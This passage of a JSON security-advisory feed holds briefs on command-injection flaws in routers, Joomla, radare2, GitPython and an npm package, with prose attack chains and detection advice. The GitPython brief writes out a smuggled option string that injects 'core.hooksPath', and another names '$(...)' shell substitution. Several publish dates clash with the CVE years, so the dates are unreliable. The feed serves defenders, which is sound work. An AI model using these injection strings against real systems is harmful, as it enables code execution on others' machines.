(CVE-2026-4627)","url":"https://feed.craftedsignal.io/briefs/2026-03-dlink-command-injection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-32968","joomla","rce","command-injection"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-32968 describes a critical remote code execution (RCE) vulnerability affecting the com_mb24sysapi module in Joomla. The vulnerability stems from improper neutralization of special elements within OS commands, allowing an unauthenticated remote attacker to inject arbitrary commands. Successful exploitation of this vulnerability can lead to complete compromise of the affected system. This vulnerability is identified as a variant of CVE-2020-10383, suggesting a similar underlying flaw…\u003c/p\u003e\n","date_modified":"2026-03-23T12:16:08Z","date_published":"2026-03-23T12:16:08Z","id":"/briefs/2026-03-joomla-rce/","summary":"An unauthenticated remote attacker can exploit an OS command injection vulnerability (CVE-2026-32968) in the com_mb24sysapi module of Joomla, leading to remote code execution and full system compromise.","title":"Joomla com_mb24sysapi Module Unauthenticated RCE (CVE-2026-32968)","url":"https://feed.craftedsignal.io/briefs/2026-03-joomla-rce/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["CVE-2026-4558","linksys","command-injection","network-device"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-4558 is a critical vulnerability affecting Linksys MR9600 routers, specifically version 2.0.6.206937. The flaw resides within the \u003ccode\u003esmartConnectConfigure\u003c/code\u003e function of the \u003ccode\u003eSmartConnect.lua\u003c/code\u003e file. Attackers can remotely inject OS commands by manipulating the \u003ccode\u003econfigApSsid\u003c/code\u003e, \u003ccode\u003econfigApPassphrase\u003c/code\u003e, \u003ccode\u003esrpLogin\u003c/code\u003e, or \u003ccode\u003esrpPassword\u003c/code\u003e arguments. Publicly available exploits exist, increasing the risk of exploitation. The vendor was notified but has not yet provided a patch or response, leaving users…\u003c/p\u003e\n","date_modified":"2026-03-23T12:00:00Z","date_published":"2026-03-23T12:00:00Z","id":"/briefs/2026-03-linksys-rce/","summary":"A remote OS command injection vulnerability exists in the Linksys MR9600 router version 2.0.6.206937, allowing attackers to execute arbitrary commands by manipulating specific function arguments via the SmartConnect.lua file.","title":"Linksys MR9600 SmartConnect OS Command Injection (CVE-2026-4558)","url":"https://feed.craftedsignal.io/briefs/2026-03-linksys-rce/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["zyxel","router","command injection","cve-2026-13942","upnp"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eA critical command injection vulnerability, tracked as CVE-2026-13942, has been discovered in the UPnP (Universal Plug and Play) service of Zyxel routers. The vulnerability stems from insufficient validation of input within the UPnP SOAP request processing.  An unauthenticated, remote attacker can exploit this flaw by sending specially crafted UPnP SOAP requests to the affected device. This allows the attacker to inject and execute arbitrary operating system commands with elevated privileges on…\u003c/p\u003e\n","date_modified":"2026-02-27T12:00:00Z","date_published":"2026-02-27T12:00:00Z","id":"/briefs/2026-02-zyxel-rce/","summary":"A critical command injection vulnerability (CVE-2026-13942) in the UPnP function of Zyxel routers allows remote attackers to execute arbitrary operating system commands by sending crafted UPnP SOAP requests.","title":"Critical Command Injection Vulnerability in Zyxel Routers (CVE-2026-13942)","url":"https://feed.craftedsignal.io/briefs/2026-02-zyxel-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.3,"id":"CVE-2022-2068"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2022-2068","command-injection","c_rehash","certificate-management"],"_cs_type":"advisory","_cs_vendors":["Microsoft"],"content_html":"\u003cp\u003eCVE-2022-2068 describes a command injection vulnerability present within the \u003ccode\u003ec_rehash\u003c/code\u003e script. This script is often used to update certificate symlinks. Successful exploitation of this vulnerability can lead to arbitrary code execution on the target system. While the Microsoft Security Response Center (MSRC) has published information regarding this vulnerability, the specifics of affected products and exploitation details require further investigation and are not explicitly detailed in the provided source. Defenders must prioritize identifying and mitigating potential attack vectors related to this vulnerability to prevent system compromise. Given the nature of command injection vulnerabilities, the impact can be severe, ranging from data theft to complete system takeover.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to a system where the \u003ccode\u003ec_rehash\u003c/code\u003e script is accessible and executable. This could involve techniques like exploiting a separate web application vulnerability, or through compromised credentials.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious certificate file or modifies an existing one to include command injection payloads within the certificate\u0026rsquo;s subject or other relevant fields.\u003c/li\u003e\n\u003cli\u003eThe attacker executes the \u003ccode\u003ec_rehash\u003c/code\u003e script, pointing it towards the directory containing the malicious certificate.\u003c/li\u003e\n\u003cli\u003eDuring execution, the \u003ccode\u003ec_rehash\u003c/code\u003e script parses the certificate, unknowingly extracting the malicious payload embedded within the certificate\u0026rsquo;s fields.\u003c/li\u003e\n\u003cli\u003eThe script then attempts to use the extracted payload as part of a command, due to the lack of proper sanitization or validation of the input.\u003c/li\u003e\n\u003cli\u003eThe injected command is executed with the privileges of the user running the \u003ccode\u003ec_rehash\u003c/code\u003e script, potentially leading to arbitrary code execution.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the code execution to install malware, establish persistence, or escalate privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves their final objective, such as data exfiltration, system disruption, or lateral movement within the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2022-2068 allows attackers to execute arbitrary commands on a vulnerable system. The impact can range from data theft and malware installation to complete system compromise and lateral movement within the network. This vulnerability poses a significant risk to organizations that rely on the \u003ccode\u003ec_rehash\u003c/code\u003e script for managing certificates. The lack of specific victim counts or sector targeting information in the provided source highlights the need for proactive detection and mitigation efforts across all potentially affected environments.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor process executions for instances of the \u003ccode\u003ec_rehash\u003c/code\u003e script executing with unusual or suspicious command-line arguments. Deploy the provided Sigma rule (\u003ccode\u003ec_rehash_command_injection\u003c/code\u003e) to detect this behavior.\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization measures for all certificate-related operations, particularly when using scripts like \u003ccode\u003ec_rehash\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eInvestigate systems where the \u003ccode\u003ec_rehash\u003c/code\u003e script is used to identify potential exploitation attempts related to CVE-2022-2068.\u003c/li\u003e\n\u003cli\u003eMonitor file system events for the creation or modification of certificates containing suspicious payloads, as these may be used in conjunction with the vulnerability. Deploy the provided Sigma rule (\u003ccode\u003esuspicious_certificate_creation\u003c/code\u003e) to detect such activity.\u003c/li\u003e\n\u003cli\u003eRegularly review and update certificate management procedures to ensure they align with security best practices and mitigate potential vulnerabilities.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-30T12:00:00Z","date_published":"2024-01-30T12:00:00Z","id":"/briefs/2024-01-30-cve-2022-2068-command-injection/","summary":"CVE-2022-2068 is a command injection vulnerability in the c_rehash script, requiring immediate attention to prevent potential arbitrary code execution.","title":"CVE-2022-2068 c_rehash Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-30-cve-2022-2068-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.8,"id":"CVE-2026-40517"}],"_cs_exploited":false,"_cs_products":["radare2"],"_cs_severities":["high"],"_cs_tags":["command-injection","radare2","CVE-2026-40517"],"_cs_type":"advisory","_cs_vendors":["radare"],"content_html":"\u003cp\u003eA command injection vulnerability, identified as CVE-2026-40517, affects radare2 versions prior to 6.1.4. This flaw resides within the PDB parser\u0026rsquo;s \u003ccode\u003eprint_gvars()\u003c/code\u003e function. An attacker can exploit this vulnerability by creating a malicious PDB file containing newline characters within symbol names. These newline characters enable the injection of arbitrary radare2 commands, which are then executed due to unsanitized symbol name interpolation. This interpolation occurs during the execution of the \u003ccode\u003eidp\u003c/code\u003e command against the malicious PDB file. Successful exploitation allows the attacker to achieve arbitrary OS command execution through radare2\u0026rsquo;s shell execution operator, posing a significant risk to systems where radare2 is used for binary analysis.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker crafts a malicious PDB file. This file contains newline characters embedded within symbol names.\u003c/li\u003e\n\u003cli\u003eThe crafted PDB file is delivered to the target system, potentially through social engineering or as part of a larger attack chain.\u003c/li\u003e\n\u003cli\u003eA user, unaware of the malicious nature of the PDB file, attempts to analyze it using radare2.\u003c/li\u003e\n\u003cli\u003eThe user executes the \u003ccode\u003eidp\u003c/code\u003e command within radare2 to parse and load debug symbols from the PDB file.\u003c/li\u003e\n\u003cli\u003eDuring the parsing process, the \u003ccode\u003eprint_gvars()\u003c/code\u003e function is called within the PDB parser.\u003c/li\u003e\n\u003cli\u003eThe function attempts to rename flags based on the symbol names read from the PDB file.\u003c/li\u003e\n\u003cli\u003eDue to the lack of proper sanitization, the newline characters in the symbol names are interpreted as command separators.\u003c/li\u003e\n\u003cli\u003eThe injected radare2 commands are executed by the shell execution operator, leading to arbitrary OS command execution. The attacker achieves arbitrary command execution on the system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the system where radare2 is running. The impact ranges from system compromise and data theft to denial of service, depending on the privileges of the user running radare2 and the commands injected by the attacker. The CVSS v3.1 base score is rated as 7.8 (High).\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade radare2 to version 6.1.4 or later to patch CVE-2026-40517.\u003c/li\u003e\n\u003cli\u003eImplement strict input validation and sanitization for PDB files processed by radare2 to prevent command injection.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect Suspicious Radare2 Process Execution\u003c/code\u003e to identify potential exploitation attempts.\u003c/li\u003e\n\u003cli\u003eMonitor radare2 process execution for unusual command line arguments (see \u003ccode\u003eDetect Suspicious Radare2 Process Execution\u003c/code\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-24T12:00:00Z","date_published":"2024-01-24T12:00:00Z","id":"/briefs/2024-01-radare2-command-injection/","summary":"A command injection vulnerability exists in radare2 versions prior to 6.1.4, where a crafted PDB file with newline characters in symbol names can inject arbitrary radare2 commands, leading to arbitrary OS command execution.","title":"radare2 PDB Parser Command Injection Vulnerability (CVE-2026-40517)","url":"https://feed.craftedsignal.io/briefs/2024-01-radare2-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2026-7154"}],"_cs_exploited":true,"_cs_products":["A8000RU 7.1cu.643_b20200521"],"_cs_severities":["critical"],"_cs_tags":["cve-2026-7154","command-injection","network-device"],"_cs_type":"threat","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eCVE-2026-7154 describes a critical vulnerability affecting the Totolink A8000RU router, specifically version 7.1cu.643_b20200521. The vulnerability is located in the \u003ccode\u003esetAdvancedInfoShow\u003c/code\u003e function within the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file, which handles CGI requests. An attacker can remotely exploit this flaw by manipulating the \u003ccode\u003etty_server\u003c/code\u003e argument, leading to OS command injection. This means an unauthenticated attacker can potentially execute arbitrary commands on the underlying operating system of the router. The exploit is publicly available, increasing the likelihood of exploitation in the wild. Successful exploitation allows complete control over the device.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable Totolink A8000RU router with the affected firmware version exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP POST request targeting the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes the \u003ccode\u003esetAdvancedInfoShow\u003c/code\u003e function call with a manipulated \u003ccode\u003etty_server\u003c/code\u003e argument containing an OS command injection payload.\u003c/li\u003e\n\u003cli\u003eThe webserver receives the crafted request and passes the \u003ccode\u003etty_server\u003c/code\u003e argument to the vulnerable function.\u003c/li\u003e\n\u003cli\u003eThe vulnerable function executes the attacker-supplied OS command due to insufficient input validation and sanitization.\u003c/li\u003e\n\u003cli\u003eThe injected command executes with the privileges of the web server process, typically root.\u003c/li\u003e\n\u003cli\u003eThe attacker gains arbitrary code execution on the router\u0026rsquo;s operating system.\u003c/li\u003e\n\u003cli\u003eThe attacker can then use this access to install malware, change router settings, or use the router as a pivot point for further attacks within the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-7154 allows a remote, unauthenticated attacker to execute arbitrary commands on the affected Totolink A8000RU router. This can lead to complete compromise of the device, potentially affecting all connected devices on the network. An attacker could steal sensitive information, disrupt network services, or use the compromised router as a botnet node. Given the public availability of the exploit, mass exploitation is a significant risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious POST requests to \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e with unusual characters or command-like syntax in the \u003ccode\u003etty_server\u003c/code\u003e parameter, as this could indicate exploitation attempts (see example Sigma rule below).\u003c/li\u003e\n\u003cli\u003eImplement network intrusion detection system (IDS) rules to detect attempts to exploit this vulnerability by monitoring HTTP traffic for malicious payloads in the \u003ccode\u003etty_server\u003c/code\u003e parameter.\u003c/li\u003e\n\u003cli\u003eApply available patches or firmware updates provided by Totolink to address CVE-2026-7154 when they become available.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-23T12:00:00Z","date_published":"2024-01-23T12:00:00Z","id":"/briefs/2024-01-totolink-a8000ru-command-injection/","summary":"A remote OS command injection vulnerability exists in the Totolink A8000RU router version 7.1cu.643_b20200521, allowing attackers to execute arbitrary commands by manipulating the 'tty_server' argument in the 'setAdvancedInfoShow' function.","title":"Totolink A8000RU OS Command Injection Vulnerability (CVE-2026-7154)","url":"https://feed.craftedsignal.io/briefs/2024-01-totolink-a8000ru-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2023-40267"}],"_cs_exploited":false,"_cs_products":["GitPython"],"_cs_severities":["high"],"_cs_tags":["gitpython","code-execution","git-hooks","command-injection"],"_cs_type":"advisory","_cs_vendors":["pip"],"content_html":"\u003cp\u003eGitPython before version 3.1.47 is susceptible to a command execution vulnerability. The issue stems from how the \u003ccode\u003e_clone()\u003c/code\u003e function validates the \u003ccode\u003emulti_options\u003c/code\u003e parameter used in the \u003ccode\u003eclone_from()\u003c/code\u003e, \u003ccode\u003eclone()\u003c/code\u003e, or \u003ccode\u003eSubmodule.update()\u003c/code\u003e methods. Specifically, the validation occurs on the original list of options before the \u003ccode\u003eshlex.split\u003c/code\u003e transformation. This allows an attacker to craft a string like \u003ccode\u003e\u0026quot;--branch main --config core.hooksPath=/x\u0026quot;\u003c/code\u003e which passes the initial validation because it starts with a safe option (\u003ccode\u003e--branch\u003c/code\u003e). However, after the string is split into tokens, the \u003ccode\u003e--config\u003c/code\u003e option becomes active, allowing the attacker to inject a malicious \u003ccode\u003ecore.hooksPath\u003c/code\u003e configuration. This configuration points Git to a directory containing attacker-controlled Git hooks, which are then executed during the clone operation. This vulnerability is similar in nature to CVE-2023-40267.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a vulnerable application using GitPython to clone repositories.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious string containing a Git configuration option, such as \u003ccode\u003e--config core.hooksPath=/path/to/malicious/hooks\u003c/code\u003e, embedded within a seemingly benign option string like \u003ccode\u003e--branch main --config core.hooksPath=/path/to/malicious/hooks\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker injects this malicious string into the \u003ccode\u003emulti_options\u003c/code\u003e parameter of the \u003ccode\u003eclone_from()\u003c/code\u003e, \u003ccode\u003eclone()\u003c/code\u003e, or \u003ccode\u003eSubmodule.update()\u003c/code\u003e methods.\u003c/li\u003e\n\u003cli\u003eGitPython\u0026rsquo;s \u003ccode\u003e_clone()\u003c/code\u003e function validates the \u003ccode\u003emulti_options\u003c/code\u003e parameter using \u003ccode\u003eGit.check_unsafe_options()\u003c/code\u003e \u003cem\u003ebefore\u003c/em\u003e it is processed by \u003ccode\u003eshlex.split()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eBecause the malicious string starts with a safe option (\u003ccode\u003e--branch\u003c/code\u003e), it bypasses the validation check.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eshlex.split()\u003c/code\u003e function then transforms the string into a list of individual options, making the \u003ccode\u003e--config\u003c/code\u003e option active.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003egit clone\u003c/code\u003e command is executed with the injected \u003ccode\u003e--config core.hooksPath=/path/to/malicious/hooks\u003c/code\u003e option, causing Git to use the attacker-controlled directory for Git hooks.\u003c/li\u003e\n\u003cli\u003eGit executes the malicious hooks (e.g., \u003ccode\u003epost-checkout\u003c/code\u003e), resulting in arbitrary code execution on the victim\u0026rsquo;s machine.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary code on the system where the GitPython library is used. Any application that passes user-supplied input to the \u003ccode\u003emulti_options\u003c/code\u003e parameter of the affected functions is vulnerable. This can lead to complete system compromise, data exfiltration, or denial of service. The vulnerability affects GitPython versions prior to 3.1.47.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade GitPython to version 3.1.47 or later to patch the vulnerability (Affected Packages).\u003c/li\u003e\n\u003cli\u003eImplement input validation and sanitization for any user-supplied input used to construct the \u003ccode\u003emulti_options\u003c/code\u003e parameter to prevent injection of malicious Git configurations (Code).\u003c/li\u003e\n\u003cli\u003eMonitor process creation events for the execution of unexpected processes from directories specified as \u003ccode\u003ecore.hooksPath\u003c/code\u003e (see Sigma rule \u003ccode\u003eDetect Suspicious Git Hook Execution\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules in this brief to your SIEM and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-23T12:00:00Z","date_published":"2024-01-23T12:00:00Z","id":"/briefs/2024-01-23-gitpython-hook-execution/","summary":"A vulnerability in GitPython versions prior to 3.1.47 allows for command execution during repository cloning by manipulating the `multi_options` parameter to inject malicious Git configurations, such as `core.hooksPath`, leading to the execution of attacker-controlled hooks.","title":"GitPython Vulnerability Allows Arbitrary Code Execution via Git Hooks","url":"https://feed.craftedsignal.io/briefs/2024-01-23-gitpython-hook-execution/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["GitPython (3.1.30-3.1.46)"],"_cs_severities":["high"],"_cs_tags":["command-injection","gitpython","vulnerability"],"_cs_type":"advisory","_cs_vendors":["pip"],"content_html":"\u003cp\u003eGitPython, a library providing programmatic interaction with Git repositories, is susceptible to a command injection vulnerability in versions 3.1.30 to 3.1.46. The vulnerability stems from insufficient validation of keyword arguments (kwargs) passed to functions like \u003ccode\u003eRepo.clone_from()\u003c/code\u003e, \u003ccode\u003eRemote.fetch()\u003c/code\u003e, \u003ccode\u003eRemote.pull()\u003c/code\u003e, and \u003ccode\u003eRemote.push()\u003c/code\u003e. Specifically, when underscore-form kwargs (e.g., \u003ccode\u003eupload_pack\u003c/code\u003e) are used, they bypass the intended safety checks designed to prevent the execution of arbitrary commands via Git options like \u003ccode\u003e--upload-pack\u003c/code\u003e. This occurs because the validation logic only checks for hyphenated forms (e.g., \u003ccode\u003eupload-pack\u003c/code\u003e). Attackers can exploit this by injecting malicious commands through these kwargs, even when \u003ccode\u003eallow_unsafe_options\u003c/code\u003e is set to its default value of \u003ccode\u003eFalse\u003c/code\u003e. This issue was reported on April 25, 2026.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a web application or system that uses GitPython to manage Git repositories.\u003c/li\u003e\n\u003cli\u003eThe attacker finds an endpoint or function where they can control kwargs passed to \u003ccode\u003eRepo.clone_from()\u003c/code\u003e, \u003ccode\u003eRemote.fetch()\u003c/code\u003e, \u003ccode\u003eRemote.pull()\u003c/code\u003e, or \u003ccode\u003eRemote.push()\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious payload, using underscore-form kwargs such as \u003ccode\u003eupload_pack\u003c/code\u003e or \u003ccode\u003ereceive_pack\u003c/code\u003e, setting their value to a command they want to execute (e.g., a shell script path or a direct command).\u003c/li\u003e\n\u003cli\u003eThe application or system, using a vulnerable version of GitPython, receives these kwargs and bypasses the intended safety check.\u003c/li\u003e\n\u003cli\u003eGitPython\u0026rsquo;s \u003ccode\u003eGit.transform_kwarg()\u003c/code\u003e method converts the underscore-form kwargs into their corresponding hyphenated Git options (e.g., \u003ccode\u003eupload_pack\u003c/code\u003e becomes \u003ccode\u003e--upload-pack\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThe Git command is executed with the attacker-controlled option, leading to arbitrary command execution on the system.\u003c/li\u003e\n\u003cli\u003eThe attacker gains unauthorized access, potentially stealing credentials, modifying repositories, or moving laterally within the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability can lead to severe consequences, especially in web applications, CI/CD systems, and automation tools that rely on GitPython for repository management. Attackers could steal SSH keys, API tokens, cloud credentials, or other sensitive information. They could also modify repositories, build outputs, or release artifacts, leading to supply chain attacks. In CI/CD environments, this vulnerability could enable lateral movement from worker nodes or compromise the entire automation infrastructure. The number of affected systems depends on the prevalence of vulnerable GitPython versions in exposed applications.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade GitPython to version 3.1.47 or later to remediate the vulnerability (affected_products).\u003c/li\u003e\n\u003cli\u003eReview code that uses \u003ccode\u003eRepo.clone_from()\u003c/code\u003e, \u003ccode\u003eRemote.fetch()\u003c/code\u003e, \u003ccode\u003eRemote.pull()\u003c/code\u003e, or \u003ccode\u003eRemote.push()\u003c/code\u003e and ensure that kwargs are properly validated to prevent attacker-controlled input (references).\u003c/li\u003e\n\u003cli\u003eImplement input validation to block underscore-form kwargs such as \u003ccode\u003eupload_pack\u003c/code\u003e or \u003ccode\u003ereceive_pack\u003c/code\u003e before they are passed to GitPython functions (references).\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eDetect GitPython Kwarg Command Injection\u003c/code\u003e to identify potential exploitation attempts in application logs (rules).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-09T10:00:00Z","date_published":"2024-01-09T10:00:00Z","id":"/briefs/2024-01-09-gitpython-cmd-injection/","summary":"GitPython versions 3.1.30 through 3.1.46 are vulnerable to command injection by passing attacker-controlled kwargs into `Repo.clone_from()`, `Remote.fetch()`, `Remote.pull()`, or `Remote.push()`, leading to arbitrary command execution due to bypassed safety checks.","title":"GitPython Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2024-01-09-gitpython-cmd-injection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["@evomap/evolver"],"_cs_severities":["critical"],"_cs_tags":["command-injection","rce","evolver"],"_cs_type":"advisory","_cs_vendors":["Evomap"],"content_html":"\u003cp\u003eA command injection vulnerability exists in the \u003ccode\u003e_extractLLM()\u003c/code\u003e function within the \u003ccode\u003esrc/gep/signals.js\u003c/code\u003e file of the evolver application, specifically in versions prior to 1.69.3. The vulnerability stems from the function\u0026rsquo;s construction of a \u003ccode\u003ecurl\u003c/code\u003e command via string concatenation, incorporating the \u003ccode\u003ecorpus\u003c/code\u003e parameter without sufficient sanitization. This parameter, derived from user input through the \u003ccode\u003eextractSignals()\u003c/code\u003e function, is susceptible to shell command substitution using the \u003ccode\u003e$(...)\u003c/code\u003e syntax when processed by \u003ccode\u003eexecSync()\u003c/code\u003e. Successful exploitation grants attackers the ability to execute arbitrary shell commands within the context of the Node.js process. This flaw poses a significant risk, potentially leading to full system compromise, data exfiltration, or the installation of malicious software.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts a malicious input string containing shell metacharacters (e.g., \u003ccode\u003e$(...)\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eThis malicious string is passed as the \u003ccode\u003euserSnippet\u003c/code\u003e parameter to the \u003ccode\u003eextractSignals()\u003c/code\u003e function within \u003ccode\u003esrc/gep/evolver.js\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003eextractSignals()\u003c/code\u003e function processes the user snippet and extracts a summary.\u003c/li\u003e\n\u003cli\u003eThe extracted summary, which includes the malicious payload, is passed as the \u003ccode\u003ecorpus\u003c/code\u003e parameter to the vulnerable \u003ccode\u003e_extractLLM()\u003c/code\u003e function in \u003ccode\u003esrc/gep/signals.js\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003e_extractLLM()\u003c/code\u003e function constructs a \u003ccode\u003ecurl\u003c/code\u003e command by concatenating strings, embedding the unsanitized \u003ccode\u003ecorpus\u003c/code\u003e parameter within the command string.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ecurl\u003c/code\u003e command is executed using \u003ccode\u003eexecSync()\u003c/code\u003e, which interprets the shell metacharacters and executes the injected commands.\u003c/li\u003e\n\u003cli\u003eThe injected commands are executed with the privileges of the Node.js process.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves remote code execution, enabling them to perform actions such as data exfiltration or system compromise.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the server hosting the evolver application. This can lead to full system compromise, allowing attackers to steal sensitive data, install malware, or pivot to other systems on the network. The vulnerability affects anyone running the evolver with the GEP (Genetic Evolution Protocol) enabled and processing user-provided content. The affected package is npm/@evomap/evolver (vulnerable: \u0026lt; 1.69.3).\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the \u003ccode\u003e@evomap/evolver\u003c/code\u003e package to version 1.69.3 or later to patch the vulnerability.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Evolver Command Injection Attempt\u0026rdquo; to identify attempts to exploit this vulnerability by detecting shell metacharacters in process execution logs.\u003c/li\u003e\n\u003cli\u003eReview and sanitize all user-provided content before it is processed by the \u003ccode\u003eextractSignals()\u003c/code\u003e and \u003ccode\u003e_extractLLM()\u003c/code\u003e functions.\u003c/li\u003e\n\u003cli\u003eImplement strict input validation to prevent shell metacharacters from reaching the vulnerable code.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-09T10:00:00Z","date_published":"2024-01-09T10:00:00Z","id":"/briefs/2024-01-09-evolver-rce/","summary":"A command injection vulnerability in the `_extractLLM()` function of the evolver application allows remote attackers to execute arbitrary shell commands by injecting shell metacharacters into the `corpus` parameter, leading to potential system compromise.","title":"Evolver Remote Code Execution via Command Injection in `_extractLLM()`","url":"https://feed.craftedsignal.io/briefs/2024-01-09-evolver-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2026-7538"}],"_cs_exploited":false,"_cs_products":["A8000RU 7.1cu.643_b20200521"],"_cs_severities":["critical"],"_cs_tags":["command-injection","rce","totolink"],"_cs_type":"advisory","_cs_vendors":["Totolink"],"content_html":"\u003cp\u003eA critical vulnerability, tracked as CVE-2026-7538, has been identified in Totolink A8000RU router firmware version 7.1cu.643_b20200521. This vulnerability resides within the CGI handler component, specifically in the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e file. The vulnerability arises from improper handling of the \u003ccode\u003eproto\u003c/code\u003e argument, which can be manipulated by an attacker to inject arbitrary operating system commands. Given that the attack can be initiated remotely and a public exploit is available, defenders should prioritize patching or implementing mitigations immediately. Exploitation could allow unauthenticated attackers to gain complete control over the affected device.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker identifies a Totolink A8000RU router with the vulnerable firmware version (7.1cu.643_b20200521) exposed to the internet.\u003c/li\u003e\n\u003cli\u003eThe attacker sends a specially crafted HTTP request to the \u003ccode\u003e/cgi-bin/cstecgi.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe HTTP request includes a malicious payload within the 